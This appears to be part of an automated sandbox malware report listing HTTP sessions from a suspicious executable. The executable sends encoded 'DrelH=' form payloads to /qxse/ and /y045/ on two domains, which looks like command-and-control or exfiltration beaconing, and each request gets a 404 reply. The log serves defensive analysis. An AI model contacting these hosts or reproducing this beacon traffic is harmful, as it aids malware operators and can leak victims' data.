                                                                                                                                  Host: www.jagdud.store
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.jagdud.store
                                                                                                                                  Referer: http://www.jagdud.store/qxse/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6d 72 46 4d 39 52 6d 53 55 78 2b 32 6d 73 59 50 65 43 6c 6e 63 34 4f 4a 47 67 69 31 4a 70 38 51 34 4c 32 71 79 41 61 2b 66 2f 37 59 56 41 6f 63 52 62 31 73 6d 4d 63 61 56 7a 6b 6c 39 72 46 61 69 39 43 4d 56 37 2f 4e 73 53 36 66 48 38 79 68 54 57 31 53 64 66 47 43 36 63 57 74 56 64 4f 39 38 57 64 57 68 69 61 53 75 78 5a 48 75 33 57 63 6f 52 52 38 55 5a 6a 72 36 54 53 43 35 43 76 35 30 79 36 4e 71 4f 48 59 68 64 39 50 75 6e 36 47 69 36 32 53 62 76 2f 2f 30 71 68 6a 72 6b 72 52 53 68 35 75 66 45 76 36 62 63 67 58 70 64 42 70 73 72 76 75 31 38 63 76 2b 49 37 56 50 32 39 69 32 51 30 4e 31 68 35 31 51 2b 31 68 67 46 59 35 79 6c 66 34 48 6a 70 63 48 6d 53 30
                                                                                                                                  Data Ascii: DrelH=mrFM9RmSUx+2msYPeClnc4OJGgi1Jp8Q4L2qyAa+f/7YVAocRb1smMcaVzkl9rFai9CMV7/NsS6fH8yhTW1SdfGC6cWtVdO98WdWhiaSuxZHu3WcoRR8UZjr6TSC5Cv50y6NqOHYhd9Pun6Gi62Sbv//0qhjrkrRSh5ufEv6bcgXpdBpsrvu18cv+I7VP29i2Q0N1h51Q+1hgFY5ylf4HjpcHmS0
                                                                                                                                  Oct 22, 2024 22:58:33.478702068 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Tue, 22 Oct 2024 20:58:33 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 389
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  31192.168.2.553234209.74.64.187801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:35.347170115 CEST1781OUTPOST /qxse/ HTTP/1.1
                                                                                                                                  Host: www.jagdud.store
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.jagdud.store
                                                                                                                                  Referer: http://www.jagdud.store/qxse/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6d 72 46 4d 39 52 6d 53 55 78 2b 32 6d 73 59 50 65 43 6c 6e 63 34 4f 4a 47 67 69 31 4a 70 38 51 34 4c 32 71 79 41 61 2b 66 2f 7a 59 56 32 55 63 44 73 70 73 6e 4d 63 61 64 54 6b 6f 39 72 45 41 69 39 61 41 56 37 7a 43 73 52 53 66 48 61 75 68 62 48 31 53 4b 76 47 43 31 38 57 77 4c 74 4f 6b 38 57 4e 53 68 69 4b 53 75 78 5a 48 75 30 2b 63 68 67 52 38 54 70 6a 6f 77 7a 53 47 30 69 75 73 30 79 79 7a 71 4f 44 69 68 74 64 50 76 48 71 47 6a 49 65 53 55 76 2f 78 7a 71 68 72 72 6b 75 4a 53 6e 64 54 66 46 62 63 62 62 6b 58 6f 64 45 4a 34 71 4b 7a 70 66 73 59 38 61 36 30 4f 6d 39 6d 6f 6a 49 74 2b 6d 4e 74 63 2f 31 78 6a 7a 67 69 77 46 57 49 54 53 56 56 46 51 62 4b 6a 55 57 67 67 39 43 70 77 53 31 4d 49 56 75 70 42 39 64 34 34 39 2b 35 33 64 4d 61 34 67 4d 47 57 6e 52 64 57 2b 70 77 6e 41 69 50 6d 51 39 74 65 74 68 4f 30 2f 72 70 48 6e 53 73 4e 7a 62 4d 5a 58 74 57 64 73 48 72 6a 69 41 49 67 42 7a 63 64 6c 63 55 31 4a 4c 44 50 54 38 79 51 67 4f 33 34 70 46 45 6b 33 48 43 42 69 50 4d 7a 56 66 51 [TRUNCATED]
                                                                                                                                  Data Ascii: DrelH=mrFM9RmSUx+2msYPeClnc4OJGgi1Jp8Q4L2qyAa+f/zYV2UcDspsnMcadTko9rEAi9aAV7zCsRSfHauhbH1SKvGC18WwLtOk8WNShiKSuxZHu0+chgR8TpjowzSG0ius0yyzqODihtdPvHqGjIeSUv/xzqhrrkuJSndTfFbcbbkXodEJ4qKzpfsY8a60Om9mojIt+mNtc/1xjzgiwFWITSVVFQbKjUWgg9CpwS1MIVupB9d449+53dMa4gMGWnRdW+pwnAiPmQ9tethO0/rpHnSsNzbMZXtWdsHrjiAIgBzcdlcU1JLDPT8yQgO34pFEk3HCBiPMzVfQHdvmGlCvpVDMA1DrHzARjcqkdyafMPAIGLMsR3IjFO6YhEed608Lz2mdNcU0XoAvvjH1pmCjbPm1+JctptE0frh4i/rWE3/hFBLB16Ka3UzCtoSJOpohk4YQxkknWvQiZnhoQLtBNCTs9Dfn+VGMyLeYkTk6K361dr44bEmHKDABJyX6rYclGRFAwSo2+uKIDcg8Qi10wzkCqljA1fL3b+jpMBxkenpaPiyjnpx6Sak5rn0z3zskwHvbbByYg7VPhdp2QOFb33yu95bYwyuE9s3ZBkdNih/aq13By5tRWgIduabtw4l7fZ8yQPN38mD2N7CoLK+0XMsO8cyWkovVVYCqeAZZi71j1VlwB/uyQjNyMSxmfrEqHvjBQbEgGdEQ9RmWVohFUtrOD3i7vSyRC8TRl7nCQA4MUqEhbd0KF8I+RPz6inmDWTXOL4DxN8nnZaGQuemfUiWP4q0iZuseOo68EIj3cP+eKf4cBio8EOjCPY51TGImogFMTF52EMxUIeb4NwU743V6E0c4JQJFyu+s+yYof3Zj772sk3PD189I+czAvpFacl4R8TR8SRFFhfwaylXau3fZKCYxMBhlSj5O+c0f2Epv0GzDj6KWOXU3PaukSD33MqSyjaGTZw2HHYMgEABD/ut61LtQVz1VS9XJ4kWU1eSysr [TRUNCATED]
                                                                                                                                  Oct 22, 2024 22:58:36.032452106 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Tue, 22 Oct 2024 20:58:35 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 389
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  32192.168.2.553235209.74.64.187801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:37.891360998 CEST481OUTGET /qxse/?DrelH=rpts+huSPQ+pmLEcaktqX4OYLAiBGOxJ0LqkryefQtnAbXwhGMtouJAJNGxD75BBoIrDH5z7ykmTX7GRRg85P9Ge9YW+EOCG2iwxhwrHmW9o/3mDrh1ZK5nR7QXShQvwtw==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.jagdud.store
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 22:58:38.597204924 CEST548INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Tue, 22 Oct 2024 20:58:38 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 389
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  33192.168.2.55323665.21.196.90801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:43.759345055 CEST747OUTPOST /y045/ HTTP/1.1
                                                                                                                                  Host: www.030002837.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.030002837.xyz
                                                                                                                                  Referer: http://www.030002837.xyz/y045/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 2f 33 70 69 34 56 64 6f 44 39 37 32 49 67 2b 59 66 70 50 4c 63 53 65 59 78 44 48 35 41 55 30 32 6d 76 38 44 4d 66 49 4b 6c 6b 59 67 37 34 70 75 44 47 48 58 52 58 45 43 53 76 72 4a 36 35 41 4e 42 73 47 58 32 6b 66 33 2f 48 2f 41 4a 4a 6b 63 64 31 52 4d 64 6b 32 30 6d 42 35 66 6b 45 6f 5a 44 2f 63 71 66 74 62 43 67 31 64 72 67 6a 47 36 77 4d 6c 7a 6e 68 39 6b 4f 79 50 79 38 61 71 5a 33 57 42 32 6a 50 2f 2f 6c 32 48 2f 64 58 38 6c 64 78 68 45 75 43 61 55 69 58 33 43 33 54 31 4d 33 70 64 77 32 78 4e 56 66 5a 4c 54 34 75 5a 78 34 6f 58 73 6d 4d 67 37 73 63 74 67 4c 42 31 44 51 66 47 58 4f 63 6f 3d
                                                                                                                                  Data Ascii: DrelH=/3pi4VdoD972Ig+YfpPLcSeYxDH5AU02mv8DMfIKlkYg74puDGHXRXECSvrJ65ANBsGX2kf3/H/AJJkcd1RMdk20mB5fkEoZD/cqftbCg1drgjG6wMlznh9kOyPy8aqZ3WB2jP//l2H/dX8ldxhEuCaUiX3C3T1M3pdw2xNVfZLT4uZx4oXsmMg7sctgLB1DQfGXOco=
                                                                                                                                  Oct 22, 2024 22:58:44.613185883 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                                  Connection: close
                                                                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                  pragma: no-cache
                                                                                                                                  content-type: text/html
                                                                                                                                  content-length: 796
                                                                                                                                  date: Tue, 22 Oct 2024 20:58:44 GMT
                                                                                                                                  vary: User-Agent
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  34192.168.2.55323765.21.196.90801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:46.295634031 CEST767OUTPOST /y045/ HTTP/1.1
                                                                                                                                  Host: www.030002837.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.030002837.xyz
                                                                                                                                  Referer: http://www.030002837.xyz/y045/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 2f 33 70 69 34 56 64 6f 44 39 37 32 4b 42 75 59 61 4f 6a 4c 4e 69 65 58 30 44 48 35 58 45 30 79 6d 76 77 44 4d 65 39 56 6c 57 4d 67 37 5a 5a 75 43 43 54 58 43 6e 45 43 48 66 72 4d 30 5a 41 38 42 73 62 69 32 6d 62 33 2f 47 62 41 4a 4d 41 63 64 43 46 4e 62 30 32 4d 71 68 35 64 37 55 6f 5a 44 2f 63 71 66 70 37 6f 67 31 56 72 67 54 32 36 78 74 6c 30 6b 68 39 72 65 69 50 79 34 61 72 78 33 57 42 55 6a 4f 6a 42 6c 79 33 2f 64 57 4d 6c 64 41 68 4c 6b 43 62 66 6d 58 33 4d 34 53 63 4c 70 37 68 42 39 68 55 6a 4c 5a 58 76 30 34 30 62 69 4b 66 45 31 73 4d 44 38 50 6c 58 61 78 55 71 4b 38 57 6e 51 4c 2f 65 41 55 77 2f 77 7a 74 62 41 34 55 47 4f 35 4c 6d 32 38 58 46
                                                                                                                                  Data Ascii: DrelH=/3pi4VdoD972KBuYaOjLNieX0DH5XE0ymvwDMe9VlWMg7ZZuCCTXCnECHfrM0ZA8Bsbi2mb3/GbAJMAcdCFNb02Mqh5d7UoZD/cqfp7og1VrgT26xtl0kh9reiPy4arx3WBUjOjBly3/dWMldAhLkCbfmX3M4ScLp7hB9hUjLZXv040biKfE1sMD8PlXaxUqK8WnQL/eAUw/wztbA4UGO5Lm28XF
                                                                                                                                  Oct 22, 2024 22:58:47.160942078 CEST1032INHTTP/1.1 404 Not Found
                                                                                                                                  Connection: close
                                                                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                  pragma: no-cache
                                                                                                                                  content-type: text/html
                                                                                                                                  content-length: 796
                                                                                                                                  date: Tue, 22 Oct 2024 20:58:46 GMT
                                                                                                                                  vary: User-Agent
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  35192.168.2.55323865.21.196.90801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:58:48.842725992 CEST1784OUTPOST /y045/ HTTP/1.1
                                                                                                                                  Host: www.030002837.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.030002837.xyz
                                                                                                                                  Referer: http://www.030002837.xyz/y045/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 2f 33 70 69 34 56 64 6f 44 39 37 32 4b 42 75 59 61 4f 6a 4c 4e 69 65 58 30 44 48 35 58 45 30 79 6d 76 77 44 4d 65 39 56 6c 57 55 67 37 72 52 75 44 6c 76 58 42 6e 45 43 62 50 72 4e 30 5a 41 68 42 73 44 6d 32 6d 48 4e 2f 46 7a 41 49 71 63 63 62 32 70 4e 53 30 32 4d 33 52 35 51 6b 45 6f 4d 44 37 77 75 66 74 58 6f 67 31 56 72 67 52 65 36 32 38 6c 30 69 68 39 6b 4f 79 50 75 38 61 72 4b 33 57 70 75 6a 4f 33 52 6c 42 2f 2f 64 32 63 6c 4f 53 5a 4c 73 43 62 64 6f 33 32 4b 34 53 41 45 70 2f 41 34 39 69 49 4a 4c 62 58 76 77 65 4e 41 77 34 48 6a 76 65 55 66 2f 63 63 36 4d 46 6b 39 4a 63 48 55 58 4a 44 42 44 6e 6b 53 2b 58 78 41 47 71 5a 2f 56 63 58 44 36 34 43 55 62 51 75 4f 36 2b 6e 74 4d 66 42 46 74 56 49 53 54 62 31 6c 5a 53 67 41 6e 6a 48 68 76 49 4e 56 4e 6f 41 32 49 58 45 4c 37 73 6a 46 74 74 74 50 51 36 4a 71 42 79 61 4d 7a 6d 63 46 4a 37 70 4c 41 6e 69 43 75 59 4b 47 79 79 49 45 4c 78 67 42 35 4a 46 6e 75 31 48 51 79 32 69 5a 74 4a 4d 44 70 63 71 71 4e 35 71 79 4f 4f 42 54 2b 77 76 65 [TRUNCATED]
